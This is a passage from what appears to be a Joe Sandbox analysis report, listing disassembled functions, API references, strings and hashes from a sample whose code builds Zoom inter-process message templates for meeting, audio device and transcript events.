                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: MeetingID$MeetingNumber$TabOrder$com.Zoom.app.conf.inviteFacebookBuddy$parentWnd
                • API String ID: 901953857-3376588250
                • Opcode ID: e79f5cc8916b636ad236f54c36867bf0d508c4cd1c82fe2c6a8b107cf35eb834
                • Instruction ID: bbf683b37fe27109b672529d78fb9ae48742264a1dc424ea6fd4c36a34f3f608
                • Opcode Fuzzy Hash: e79f5cc8916b636ad236f54c36867bf0d508c4cd1c82fe2c6a8b107cf35eb834
                • Instruction Fuzzy Hash: 53E0D8B1A40F40AFE711BB986C8B75C7750AB00F1AF500569F1016E2D6CBF40548D7B9
                Function 00C686C0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C686C7
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_JII@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyConfStatus,0000271B,MeetingID,MeetingNumber,status,FailoverReason,00000004), ref: 00C686EF
                  • Part of subcall function 00C86120: __EH_prolog3.LIBCMT ref: 00C86127
                  • Part of subcall function 00C86120: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_JI@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C686F4,com.Zoom.app.conf.notifyConfStatus,0000271B,MeetingID,MeetingNumber,status,FailoverReason,00000004), ref: 00C86140
                  • Part of subcall function 00C8635D: __EH_prolog3_GS.LIBCMT ref: 00C86364
                  • Part of subcall function 00C8635D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6871B), ref: 00C86378
                  • Part of subcall function 00C8635D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,00000044,00C6871B), ref: 00C863AA
                  • Part of subcall function 00C8635D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C863E7
                  • Part of subcall function 00C8635D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,?,-00000004), ref: 00C86419
                  • Part of subcall function 00C8635D: EnterCriticalSection.KERNEL32(00C6871B), ref: 00C8649B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$Cmm@@_H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: FailoverReason$MeetingID$MeetingNumber$com.Zoom.app.conf.notifyConfStatus$status
                • API String ID: 3905976763-451630439
                • Opcode ID: b395dc0d0ea1501f7b2a2553b7500c93ee9ee1397219c7977467650cdcbd4b5c
                • Instruction ID: 3417a7bed7ff580d2413bf17c8f0a5d430b77094872f6ce1d2d1d1e98ba2ac68
                • Opcode Fuzzy Hash: b395dc0d0ea1501f7b2a2553b7500c93ee9ee1397219c7977467650cdcbd4b5c
                • Instruction Fuzzy Hash: 65E0D8B0B40B50EBD710BF54BC0BB5C76A06B00F19F840A38B1549A3D6CBF00608D779
                Function 00C6CA70 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CA77
                • ??0?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.meeting.cache.bytes.kv.op,0000275B,data_type,key,bytes_value,action,00000004), ref: 00C6CA9F
                  • Part of subcall function 00C8C8C0: __EH_prolog3.LIBCMT ref: 00C8C8C7
                  • Part of subcall function 00C8C8C0: ??0?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6CAA4,com.Zoom.app.meeting.cache.bytes.kv.op,0000275B,data_type,key,bytes_value,action,00000004), ref: 00C8C8E0
                  • Part of subcall function 00C8CA60: __EH_prolog3_GS.LIBCMT ref: 00C8CA67
                  • Part of subcall function 00C8CA60: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CACB), ref: 00C8CA7B
                  • Part of subcall function 00C8CA60: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,00000044,00C6CACB), ref: 00C8CAAD
                  • Part of subcall function 00C8CA60: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8CAEA
                  • Part of subcall function 00C8CA60: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,?,-00000004), ref: 00C8CB1C
                  • Part of subcall function 00C8CA60: EnterCriticalSection.KERNEL32(00C6CACB), ref: 00C8CB9E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@V12@@
                • String ID: action$bytes_value$com.Zoom.app.meeting.cache.bytes.kv.op$data_type$key
                • API String ID: 3479804182-3532546848
                • Opcode ID: a639d2da9ea85500a5631a05bb09040fd097a4aa1d126875327b64b184edb8ac
                • Instruction ID: 81d28466491f485689ac31d8978414d7421fec0b9d5d06de5701580d6b3f4f71
                • Opcode Fuzzy Hash: a639d2da9ea85500a5631a05bb09040fd097a4aa1d126875327b64b184edb8ac
                • Instruction Fuzzy Hash: 6FE0D1717C0354BAD710B7649C87B6D7250A710F19F554618B1401A2C1CFF44A48D775
                Function 00C70B40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70B47
                • ??0?$CmmMessageTemplate_4@HHHH@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.audio.facility,00002753,FromApp,AudioDevType,OperateType,NeedUserConfirm,00000004), ref: 00C70B6F
                  • Part of subcall function 00C913C0: __EH_prolog3.LIBCMT ref: 00C913C7
                  • Part of subcall function 00C913C0: ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C70B74,com.Zoom.app.conf.operate.audio.facility,00002753,FromApp,AudioDevType,OperateType,NeedUserConfirm,00000004), ref: 00C913E0
                  • Part of subcall function 00C91470: __EH_prolog3_GS.LIBCMT ref: 00C91477
                  • Part of subcall function 00C91470: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70B9B), ref: 00C9148B
                  • Part of subcall function 00C91470: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.operate.audio.facility,00000044,00C70B9B), ref: 00C914BD
                  • Part of subcall function 00C91470: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C914FA
                  • Part of subcall function 00C91470: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.operate.audio.facility,?,-00000004), ref: 00C9152C
                  • Part of subcall function 00C91470: EnterCriticalSection.KERNEL32(00C70B9B), ref: 00C915AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: AudioDevType$FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.audio.facility
                • API String ID: 1561877593-1063733632
                • Opcode ID: 3ea9692454f6fa5795041349d20f27ca0d26f38ffd486bfb98781d5a5527dc69
                • Instruction ID: bf4aed40e929c4feb10d3d74fb384f407e1d351d41aa7d4011da24487fe33880
                • Opcode Fuzzy Hash: 3ea9692454f6fa5795041349d20f27ca0d26f38ffd486bfb98781d5a5527dc69
                • Instruction Fuzzy Hash: 85E068B0A80391BFCB00FB649C0B71D76A0A700F8DF00C628B6853A2D1CBF04608D771
                Function 00C72CA0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72CA7
                • ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,00009E95,nSpokenLangId,strSpokenLangName,nTranscriptLangId,strTranscriptLangName,00000004), ref: 00C72CCF
                  • Part of subcall function 00C92D60: __EH_prolog3.LIBCMT ref: 00C92D67
                  • Part of subcall function 00C92D60: ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C72CD4,com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,00009E95,nSpokenLangId,strSpokenLangName,nTranscriptLangId,strTranscriptLangName,00000004), ref: 00C92D80
                  • Part of subcall function 00C92F20: __EH_prolog3_GS.LIBCMT ref: 00C92F27
                  • Part of subcall function 00C92F20: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C72CFB), ref: 00C92F3B
                  • Part of subcall function 00C92F20: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,00000044,00C72CFB), ref: 00C92F6D
                  • Part of subcall function 00C92F20: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C92FAA
                  • Part of subcall function 00C92F20: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,?,-00000004), ref: 00C92FDC
                  • Part of subcall function 00C92F20: EnterCriticalSection.KERNEL32(00C72CFB), ref: 00C9305E
                Strings
                • nTranscriptLangId, xrefs: 00C72CB6
                • strSpokenLangName, xrefs: 00C72CBB
                • nSpokenLangId, xrefs: 00C72CC0
                • com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify, xrefs: 00C72CCA
                • strTranscriptLangName, xrefs: 00C72CB1
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify$nSpokenLangId$nTranscriptLangId$strSpokenLangName$strTranscriptLangName
                • API String ID: 2908724648-2456917703
                • Opcode ID: 2fb4bf1ff77a8eb8f6798aa1ccc1ce63985fc8a6f05b397906a953b009933d39
                • Instruction ID: ac4bf8352a2e118588783c5fe0a8f04568ee623ea8a02b32b965bc323ee24810
                • Opcode Fuzzy Hash: 2fb4bf1ff77a8eb8f6798aa1ccc1ce63985fc8a6f05b397906a953b009933d39
                • Instruction Fuzzy Hash: 9DE09BB2641350BADB117B58C80771F2650A710F15F40C068B1442E3C1CBF5460CD675
                Function 00C6EC20 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EC27
                • ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,00009DD9,deviceID,deviceType,result,channelName,00000004), ref: 00C6EC4F
                  • Part of subcall function 00C8E900: __EH_prolog3.LIBCMT ref: 00C8E907
                  • Part of subcall function 00C8E900: ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7B838,?,?,?,?,?,?,00000004,00C6E9AB,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request), ref: 00C8E920
                  • Part of subcall function 00C8EDD4: __EH_prolog3_GS.LIBCMT ref: 00C8EDDB
                  • Part of subcall function 00C8EDD4: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6EC7B), ref: 00C8EDEF
                  • Part of subcall function 00C8EDD4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,00000044,00C6EC7B), ref: 00C8EE21
                  • Part of subcall function 00C8EDD4: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8EE5E
                  • Part of subcall function 00C8EDD4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,?,-00000004), ref: 00C8EE90
                  • Part of subcall function 00C8EDD4: EnterCriticalSection.KERNEL32(00C6EC7B), ref: 00C8EF12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response$deviceID$deviceType$result
                • API String ID: 2908724648-140503531
                • Opcode ID: d7e1f705596dade7f758e51ef0f9a093323993c30d6dd417bb190d22e735d728
                • Instruction ID: 9700dfaac74462f8ada65b368ed2af8c473325cc1d29f8a52d373102460996b3
                • Opcode Fuzzy Hash: d7e1f705596dade7f758e51ef0f9a093323993c30d6dd417bb190d22e735d728
                • Instruction Fuzzy Hash: EFE092B06407D4BFDB10BF59C80B75D2660A700B95F418969B2001A2D2CFF14508D779
                Function 00C70EB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70EB7
                • ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.assistant.update.register.server.request,00009CE7,LineCallId,Registrar,ProxyServer,Protocol,00000004), ref: 00C70EDF
                  • Part of subcall function 00C8E6B0: __EH_prolog3.LIBCMT ref: 00C8E6B7
                  • Part of subcall function 00C8E6B0: ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7B908,?,?,?,?,?,?,00000004,00C6E709,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E6D0
                  • Part of subcall function 00C91770: __EH_prolog3_GS.LIBCMT ref: 00C91777
                  • Part of subcall function 00C91770: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70F0B), ref: 00C9178B
                  • Part of subcall function 00C91770: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.update.register.server.request,00000044,00C70F0B), ref: 00C917BD
                  • Part of subcall function 00C91770: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C917FA
                  • Part of subcall function 00C91770: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.update.register.server.request,?,-00000004), ref: 00C9182C
                  • Part of subcall function 00C91770: EnterCriticalSection.KERNEL32(00C70F0B), ref: 00C918AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: LineCallId$Protocol$ProxyServer$Registrar$com.zoom.app.assistant.update.register.server.request
                • API String ID: 2901042537-1147628736
                • Opcode ID: 1d034c30862a4b5d252a2f02a23c7da1403dc1f1ed103fe8754fe5ee5a24c6e2
                • Instruction ID: 18462dbd684a0155ae3b8d6d546fa8a7daffa9c9ed47f9e7b3f2019877cc207d
                • Opcode Fuzzy Hash: 1d034c30862a4b5d252a2f02a23c7da1403dc1f1ed103fe8754fe5ee5a24c6e2
                • Instruction Fuzzy Hash: 18E09271A80395BEDB10BB948C07B6D6AA0AB10F59F518128B1507B2D2CBF44548D775
                Function 00C8E502 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E509
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C8E541
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID), ref: 00C8E56F
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID), ref: 00C8E5AC
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type), ref: 00C8E5DC
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request), ref: 00C8E664
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value), ref: 00C8E681
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID), ref: 00C8E694
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 817aa354aeb71b29448d0198c88bc605de4462e8c043d620487c5cfec86d5045
                • Instruction ID: 0f1bc79f72e89cb9578069deef82a613f56aa59d8baad57d1b7a4fd261d404e9
                • Opcode Fuzzy Hash: 817aa354aeb71b29448d0198c88bc605de4462e8c043d620487c5cfec86d5045
                • Instruction Fuzzy Hash: 5B519D74E003289FCF14EFA4C9456DDBBB5AF59315F004119EC12AB391EB309A4ADBA9
                Function 00C92BC0 Relevance: 12.1, APIs: 8, Instructions: 125COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92BC7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92BF9
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
